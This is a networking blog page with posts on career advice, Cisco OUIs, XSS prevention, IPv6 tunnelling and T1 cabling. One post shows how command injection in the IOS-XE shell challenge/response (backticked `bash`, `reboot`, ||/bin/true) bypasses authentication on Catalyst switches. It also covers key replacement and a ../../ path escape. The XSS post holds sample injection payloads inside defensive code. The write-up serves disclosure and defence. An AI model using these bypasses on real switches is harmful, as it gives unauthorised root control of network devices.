Showing posts with label CCENT. Show all posts

Friday, December 28, 2018

Professions are here for a reason


Thanks to Ivan Pepelnjak for the one below, and for many others as well!

An unused knob is sometimes better than a used one.
Professions are here for a reason – they enable people to do the work they’re qualified to do.
Needless to say, it took him decades to fully understand its implications.
Do what you’re qualified to do. Don’t think you’re good at everything just because you can Google-and-paste. Figure out where your limitations are.
Seek help when you’re dealing with something beyond your comfort zone. The amount of ignorant improvisation we see in IT is stupefying. Have you ever wondered why lawyers and doctors ask for a second opinion?
Yes, I know your manager expects you to know everything just because you have administrator or engineer in your job title, which just proves he never thought about the next two paragraphs.
Don’t think you understand other people’s jobs. I’m always amazed to watch people completely unqualified to have an opinion on a problem loudly offering it just because they’re experts in a totally unrelated field. PhDs in chemistry telling IT engineers how to do their jobs would be one of my first-hand experiences.
Don’t think you could do their jobs better than they do… until you’ve tried and proved you can succeed while facing the same constraints they have. My favorite one: an airline pilot confident he could write a program to do the airline’s crew scheduling (which is probably an NP-hard problem) on a Commodore 64.
Having said all that, do your job well if you want to earn and retain the trust of your peers. If you’re obviously clueless, or randomly throwing fixes at the problem to figure out which one might stick, don’t be surprised when everyone else starts acting in the ways I described above.
Accept help (courtesy of Chris Young).  When a grey-beard gives you a piece of advice - LISTEN. Doesn’t mean you have to accept it as truth or obey their commands, but watching people new to the profession make the same mistakes we all made 20 years ago because they didn’t heed the warning is frustrating…
And “I told you so” doesn’t fix the network or the harm that major network outages cause to our reputation as a profession.

Friday, November 30, 2018

Cisco IOS-XE - Request Platform System Shell

Verifying Authenticity for Digitally Signed Images


Vulnerability in older Catalyst 3650 & 3850 switches: the platform shell is gated by a challenge/response check against a Cisco key, and without the right response you are refused.
[code]
Catalyst-3650#request system shell
Activity within this shell can jeopardize the functioning of the system.
Are you sure you want to continue? [y/n] y
Challenge: 94d5c01766c7a0a29c8c59fec3ab992[..]
Please enter the shell access response based on the
above challenge (Press "Enter" when done or to quit.):
/bin/sh
Key verification failed
[/code]

Bypass: the response is passed to a shell, so a command wrapped in backticks runs before the key is even checked.
[code]
Please enter the shell access response based on the above challenge
(Press "Enter" when done or to quit.):
`bash 1>&2`
[/code]

There is no input validation at all, so any backticked command is executed; here the switch reboots even though the key verification failed:
[code]
Please enter the shell access response based on the above challenge
(Press "Enter" when done or to quit.):
`reboot`
SecureShell: SecureShell [debug]Key verification failed
Switch#
  
Unmounting ng3k filesystems...
Unmounted /dev/sda3...
Warning! - some ng3k filesystems may not have unmounted cleanly...
Please stand by while rebooting the system...
Restarting system.
  
Booting...Initializing RAM +++++++@@@@@@@@...++++++++
[/code]

Netcat is already on the box:
[code]
bash-3.2# find / -name nc
/tmp/sw/mount/cat3k_caa-infra.SPA.03.03.03SE.pkg/usr/binos/bin/nc
/usr/binos/bin/nc
[/code]

What can be done with it? Anything you can cross-compile for the platform: build a MIPS toolchain, copy the binary in over USB and run it (here the ninvaders game, just to show that foreign native code runs):
[code]

[EXTRA]    Building a toolchain for:                 
[EXTRA]      build  = x86_64-unknown-linux-gnu
[EXTRA]      host   = x86_64-unknown-linux-gnu
[EXTRA]      target = mips-unknown-elf           

bash-3.2# file /mnt/usb0/ninvaders
/mnt/usb0/ninvaders: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV),
dynamically linked (uses shared libs), for GNU/Linux 2.6.18, with unknown capability
0x41000000 = 0xf676e75, stripped

[/code]

When you request the shell, the following happens:

a) shell_wrapper calls system("code_sign_verify_nova_pkg SecureShell <challenge> <response>") (the same binary that verifies the signed images)
b) code_sign_verify_nova_pkg reads 2 kB from /dev/mtdblock6 via libcodesign_pd.so and libflash.so (the RSA public key), uses it to check the response against the challenge (the response is expected to be the challenge signed with the matching private key), and returns 0 if it is valid, nonzero otherwise
c) the response is never sanitised before it reaches system(), so anything like ||/bin/true turns a failed check into a successful command line and the wrapper lets you in

shell_wrapper skips the verification entirely if DISABLE_SHELL_AUTHENTICATION=1 is set in its environment.
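To make the mechanism concrete, here is an added example (not code from the post or from Cisco) modelling the wrapper in Python: the vulnerable variant splices the response into one command line for /bin/sh, which is exactly what system() does, and the hardened variant allow-lists both values and passes them as separate argv entries. The verifier name is the one the post gives; the challenge value and the function names are mine, and the binary is assumed to be absent on the host, so the genuine check always fails and only an injected command can produce exit status 0.

```python
"""Added example, not code from the post or from Cisco.

Models the two ways a shell wrapper can hand the challenge/response pair to a
verifier binary.  VERIFIER is the name the post gives for that binary; it is
assumed NOT to exist on the machine running this file, so the genuine check
always fails (exit 127) and only an injected command can turn the status into 0.
"""
import os
import re
import subprocess

VERIFIER = "code_sign_verify_nova_pkg"
HEX_RE = re.compile(r"[0-9a-fA-F]+")
# Constructed stand-in for the hex challenge the switch prints (not a real one).
SAMPLE_CHALLENGE = "94d5c01766c7a0a29c8c59fec3ab9920"


def verify_via_shell(challenge: str, response: str) -> int:
    """Vulnerable form, as the post describes shell_wrapper.

    The response is spliced into a single command line that /bin/sh parses,
    which is what system() does.  0 means 'valid' to the caller, so any
    response that makes the *command line* succeed is accepted.
    """
    if os.environ.get("DISABLE_SHELL_AUTHENTICATION") == "1":
        return 0  # the bypass the post mentions: never inherit this variable
    cmd = f"{VERIFIER} SecureShell {challenge} {response}"
    return subprocess.call(cmd, shell=True,
                           stdin=subprocess.DEVNULL, stderr=subprocess.DEVNULL)


def verify_via_argv(challenge: str, response: str) -> int:
    """Hardened form.

    Both inputs must be plain hex (a signature never needs anything else) and
    are passed as separate argv entries, so no shell ever interprets them.
    Returns -1 for rejected input, otherwise the verifier's exit status
    (127 when the binary is missing, mirroring a shell's 'not found').
    """
    if not (HEX_RE.fullmatch(challenge) and HEX_RE.fullmatch(response)):
        return -1
    try:
        return subprocess.call([VERIFIER, "SecureShell", challenge, response],
                               stdin=subprocess.DEVNULL,
                               stderr=subprocess.DEVNULL)
    except FileNotFoundError:
        return 127


if __name__ == "__main__":
    # 'x||true' is the same trick as the post's ||/bin/true and the backticked
    # `reboot`: the verifier fails, the shell runs the second command, status 0.
    for resp in ("deadbeefdeadbeef", "x||true", "`/bin/true`"):
        print(f"{resp:18} shell={verify_via_shell(SAMPLE_CHALLENGE, resp):4d}"
              f"  argv={verify_via_argv(SAMPLE_CHALLENGE, resp)}")
```

Run it and the honest response fails both ways, x||true is accepted by the shell variant only, and the backticked form runs its substitution but then fails the real check. Scrub DISABLE_SHELL_AUTHENTICATION from the environment before exec as well, since the wrapper trusts it blindly.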

The RSA public key lives in mtdblock6 and can be replaced, so whoever can write that partition can install a key of their own and produce valid responses with its private companion.

The IOS filesystem jail (/mnt/sd3/user) can be escaped with ../../, so
[code]
copy foo ../../etc
[/code]
copies foo to /etc.

Wednesday, October 17, 2018

Cisco MACs (OUI) addresses - all of them

00:00:0C        Cisco                  # CISCO SYSTEMS, INC.
00:01:42        Cisco                  # CISCO SYSTEMS, INC.
00:01:43        Cisco                  # CISCO SYSTEMS, INC.
00:01:63        Cisco                  # CISCO SYSTEMS, INC.
00:01:64        Cisco                  # CISCO SYSTEMS, INC.
00:01:96        Cisco                  # CISCO SYSTEMS, INC.
00:01:97        Cisco                  # CISCO SYSTEMS, INC.
00:01:C7        Cisco                  # CISCO SYSTEMS, INC.
00:01:C9        Cisco                  # CISCO SYSTEMS, INC.
00:02:16        Cisco                  # CISCO SYSTEMS, INC.
00:02:17        Cisco                  # CISCO SYSTEMS, INC.
00:02:3D        Cisco                  # Cisco Systems, Inc.
00:02:4A        Cisco                  # CISCO SYSTEMS, INC.

Sunday, September 30, 2018

Steps to prevent cross-site scripting attacks

Cross-site scripting attacks

How-to: prevent the XSS attack vector from being leveraged

 Additional steps from Development to Deployment

 **Developers** 

     - should determine what safe user input looks like and reject everything else, be it text, JavaScript or any other unauthorised piece of code
    - depending on the input field, can restrict the text to certain characters (avoiding the ones that cause trouble) and limit the maximum number of characters
    - should write code that ensures improperly formatted data is never inserted directly into the HTML content, where it could compromise the whole web application
    - should use prepared statements (known to be reliable) for all database queries, in addition to the input validation described above

**Website operators**

    - should choose third-party web app providers carefully, to ensure their products have the right security measures in place
    - should test the web apps to ensure they are not vulnerable to cross-site scripting or SQL injection
    - should continuously scan their sites in real time to detect any unauthorised code; this should involve more than automated website vulnerability scanners (e.g. Nikto or the OWASP tools)
    - have to be proactive ==> hire experienced professionals (white- or grey-hat) who can assess the web app's security against attacks like these with a custom approach
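As an added example (mine, not from the post or the TechRepublic article it cites), the developer controls above side by side with the habits they replace, in Python with an in-memory sqlite3 database standing in for the site's database; the table, function names and the two payloads are constructed for illustration.

```python
"""Added example, not from the post or the TechRepublic article it cites.

A minimal comment-board handler showing the developer controls side by side
with the vulnerable habits they replace: allow-list validation of input,
parameterised SQL, and escaping on output into HTML.  An in-memory sqlite3
database stands in for the site's database; all inputs are constructed.
"""
import html
import re
import sqlite3

USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")   # what a username may contain
MAX_COMMENT_LEN = 500

# Constructed payloads, one per attack class the article mentions.
XSS_PAYLOAD = '<img src=x onerror="alert(document.cookie)">'
SQLI_PAYLOAD = "nobody' OR '1'='1"


def validate_username(name: str) -> str:
    """Allow-list: reject anything but the characters a username needs."""
    if not USERNAME_RE.fullmatch(name):
        raise ValueError(f"rejected username {name!r}")
    return name


def validate_comment(text: str) -> str:
    """Free text cannot be allow-listed character by character, so bound its
    length, drop control characters and leave the rest to output escaping."""
    if len(text) > MAX_COMMENT_LEN:
        raise ValueError("comment too long")
    if any(ord(c) < 0x20 and c not in "\n\t" for c in text):
        raise ValueError("control characters in comment")
    return text


def new_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE comments (user TEXT NOT NULL, body TEXT NOT NULL)")
    return conn


def store_comment(conn: sqlite3.Connection, user: str, body: str) -> None:
    """Prepared statement: the values travel separately from the SQL text,
    so a quote inside `body` is data, never syntax."""
    conn.execute("INSERT INTO comments (user, body) VALUES (?, ?)",
                 (validate_username(user), validate_comment(body)))


def comments_by_user_unsafe(conn: sqlite3.Connection, user: str) -> list:
    """Vulnerable: SQL built by string formatting at a spot that skipped the
    username check.  A quote in `user` rewrites the WHERE clause."""
    return conn.execute(
        f"SELECT user, body FROM comments WHERE user = '{user}'").fetchall()


def comments_by_user(conn: sqlite3.Connection, user: str) -> list:
    """Same query, parameterised: the payload simply matches no row."""
    return conn.execute(
        "SELECT user, body FROM comments WHERE user = ?", (user,)).fetchall()


def render_unsafe(rows: list) -> str:
    """Vulnerable: stored text dropped straight into the HTML response."""
    return "".join(f"<li><b>{u}</b>: {b}</li>" for u, b in rows)


def render(rows: list) -> str:
    """Escape on output: every untrusted value is entity-encoded for an HTML
    text context (attribute, URL and JavaScript contexts need their own
    encoders; input validation alone does not make data safe to embed)."""
    return "".join(f"<li><b>{html.escape(u)}</b>: {html.escape(b)}</li>"
                   for u, b in rows)


if __name__ == "__main__":
    db = new_db()
    store_comment(db, "alice", XSS_PAYLOAD)    # stored safely, payload intact
    store_comment(db, "bob", "plain text")
    print("unsafe render :", render_unsafe(comments_by_user(db, "alice")))
    print("escaped render:", render(comments_by_user(db, "alice")))
    print("unsafe query  :", len(comments_by_user_unsafe(db, SQLI_PAYLOAD)), "rows")
    print("safe query    :", len(comments_by_user(db, SQLI_PAYLOAD)), "rows")
```

Note that the XSS payload is stored as-is: the defence is escaping at the point where it is written into HTML, not mangling it on the way into the database. The injection payload shows why validation at the form is not enough on its own; the one query site that skipped it is the one that leaks every row.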
 ========================================================================
     The last step is important!
Anything less than a proactive, comprehensive approach to securing the sites ends in the exposure of large amounts of customer data, and under regulations like GDPR in liability for it.
     As a good example of the do's & don'ts we might mention the recent attack on British Airways, but you can pick practically any of the large attacks of the past 5 years.
 ========================================================================
         
                   ::Remember::

 Just because a website is secure does not necessarily mean that its web applications are secure as well.
     
 source: TechRepublic 
( https://www.techrepublic.com/article/british-airways-data-theft-demonstrates-need-for-cross-site-scripting-restrictions )

Thursday, July 7, 2016

IPv6 tunnelling


IPv6 Tunnelling
w/Cisco Router 2811


telnet 64.62.142.154

*************************************************************************
*****                      route-server.he.net                      *****
*****              Hurricane Electric IP Route Monitor              *****
*****                           AS 6939                             *****
*************************************************************************

This router maintains peering sessions with some of the core routers in
Hurricane Electric's network. Hurricane Electric operates an international
Internet Backbone and offers transit, colocation, and dedicated servers.

Location                  IPv4                  IPv6
---------------------     ----------------      ------------------------
North America
 Equinix Seattle          216.218.252.176       2001:470:0:3d::1
 Equinix Palo Alto        216.218.252.165       2001:470:0:1b::1
 Equinix San Jose         216.218.252.164       2001:470:0:1a::1
 Hurricane Fremont 1      216.218.252.161       2001:470:0:23::1
 One Wilshire Los Angeles 216.218.252.178       2001:470:0:6c::1
 Equinix Chicago          216.218.252.168       2001:470:0:16::1
 Equinix Dallas           216.218.252.167       2001:470:0:1d::1
 Equinix Toronto          216.218.252.147       2001:470:0:99::1
 Equinix New York         216.218.252.171       2001:470:0:13::1
 Equinix Ashburn          216.218.252.169       2001:470:0:17::1
 NOTA Miami               216.218.252.177       2001:470:0:4a::1
 CoreSite Denver          216.218.252.157       2001:470:0:155::1
 1102 Grand Kansas City   216.218.252.190       2001:470:0:22b::1
 Cologix Montreal         216.218.252.193       2001:470:0:224::1
Europe
 Telecity London          216.218.252.211       2001:470:0:2cc::1
 NIKHEF Amsterdam         216.218.252.173       2001:470:0:e::1
 Interxion Frankfurt      216.218.252.174       2001:470:0:2a::1
 Telehouse Paris          216.218.252.184       2001:470:0:1ae::1
 Equinix Zurich           216.218.252.153       2001:470:0:10c::1
 TeleCity Stockholm       216.218.252.154       2001:470:0:10f::1
 PLIX/LIM Warsaw          216.218.252.189       2001:470:0:215::1
Asia
 Mega-I Hong Kong         216.218.252.180       2001:470:0:c2::1
 Equinix Tokyo            216.218.252.151       2001:470:0:10a::1
 Equinix Singapore        216.218.252.179       2001:470:0:169::1

Configuration of IPv6 Tunnelling

(The IP addresses have been changed for security reasons.)
conf t
ipv6 unicast-routing
!
interface Tunnel0
 description Hurricane Electric IPv6 Tunnel Broker
 no ip address
 ipv6 address 2001:220:6E:218::2/64
 ipv6 enable
 tunnel source 28.10.16.15
 tunnel mode ipv6ip
 tunnel destination 216.66.86.12
!
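As an added example (not the post's own configuration), the same tunnel completed with the default route that sends all IPv6 traffic into it, plus the commands to verify it. The addresses are the post's placeholders; the broker's end of the /64 is assumed to be ::1.

```cisco
! Added example (not the post's configuration): the tunnel as above plus the
! pieces that make traffic actually flow.  Addresses are the post's
! placeholders; 2001:220:6E:218::1 is assumed to be the broker's end of the /64.
conf t
ipv6 unicast-routing
!
interface Tunnel0
 description Hurricane Electric IPv6 Tunnel Broker
 no ip address
 ipv6 address 2001:220:6E:218::2/64
 ipv6 enable
 tunnel source 28.10.16.15
 tunnel mode ipv6ip
 tunnel destination 216.66.86.12
!
! Without this, IPv6 traffic has nowhere to go; the tunnel alone only
! reaches the broker's ::1.
ipv6 route ::/0 Tunnel0
end
!
! Verification: interface up with the /64, the far end answers, route present
show ipv6 interface brief Tunnel0
ping ipv6 2001:220:6E:218::1
show ipv6 route
```

The tunnel source must be the public IPv4 address registered with the broker (or the interface that carries it); if the router sits behind NAT, protocol 41 has to be forwarded to it, or the tunnel stays down with no error beyond failed pings.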


Monday, July 4, 2016

E1/T1 RJ45 (RJ48) back-to-back with 2MFT-TE1



Cabling T1/E1 crossover for back-to-back connection

The prerequisite is a Multiflex Trunk card (1MFT or 2MFT) in each router.

Set the card type on the router:
card type t1 0 2
or, for E1:
card type e1 0 2

Then connect both cards with a T1/E1 crossover cable.

Next configure the T1 or E1 controller on each side. One end has to be the DCE (clock source internal independent) and the other the DTE (clock source line).
(The controller numbers depend on the HWIC slot; mine is in slot 2.)

Router1
controller T1 0/2/0
cablelength long 0db
framing esf
clock source internal independent
linecode b8zs
channel-group 0 timeslots 1-24 speed 64

Router2
controller T1 0/2/0
cablelength long 0db
framing esf
clock source line
linecode b8zs
channel-group 0 timeslots 1-24 speed 64

This creates a logical serial interface on each router (Serial0/2/0:0).

Give them IP addresses (point-to-point /30, i.e. a 255.255.255.252 subnet).

Verify with CDP and ping commands.
Running over T1 / E1 now! :)
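The whole procedure as one added example (not from the post): both routers' controller and serial configuration plus the verification commands. The slot numbering follows the post (HWIC slot 2); the 10.0.0.0/30 addressing and the interface descriptions are my choice.

```cisco
! Added example (not the post's configuration): complete back-to-back T1
! on both routers.  Assumes the MFT card sits in HWIC slot 2 on both ends
! and a 10.0.0.0/30 link (chosen here, not from the post).
! Crossover cable pinout for T1/E1 RJ-48: pin 1 <-> 4, pin 2 <-> 5.
!
! --- Router1 (DCE side: provides the clock) ---
card type t1 0 2
!
controller T1 0/2/0
 cablelength long 0db
 framing esf
 linecode b8zs
 clock source internal independent
 channel-group 0 timeslots 1-24 speed 64
!
interface Serial0/2/0:0
 description back-to-back T1 to Router2
 ip address 10.0.0.1 255.255.255.252
 no shutdown
!
! --- Router2 (DTE side: recovers the clock from the line) ---
card type t1 0 2
!
controller T1 0/2/0
 cablelength long 0db
 framing esf
 linecode b8zs
 clock source line
 channel-group 0 timeslots 1-24 speed 64
!
interface Serial0/2/0:0
 description back-to-back T1 to Router1
 ip address 10.0.0.2 255.255.255.252
 no shutdown
!
! --- Verification (either side) ---
! controller up, no alarms (LOS/AIS/RAI) and no slips
show controllers t1 0/2/0
! line protocol up, default HDLC encapsulation
show interfaces Serial0/2/0:0
show cdp neighbors detail
ping 10.0.0.2
```

For E1 use card type e1 0 2 and controller E1 0/2/0 with channel-group 0 timeslots 1-31; there is no cablelength command on E1, and the E1 defaults (crc4 framing, hdb3 line code) work back-to-back. If show controllers reports slips on the DTE side, it is almost always because both ends were left on internal clock.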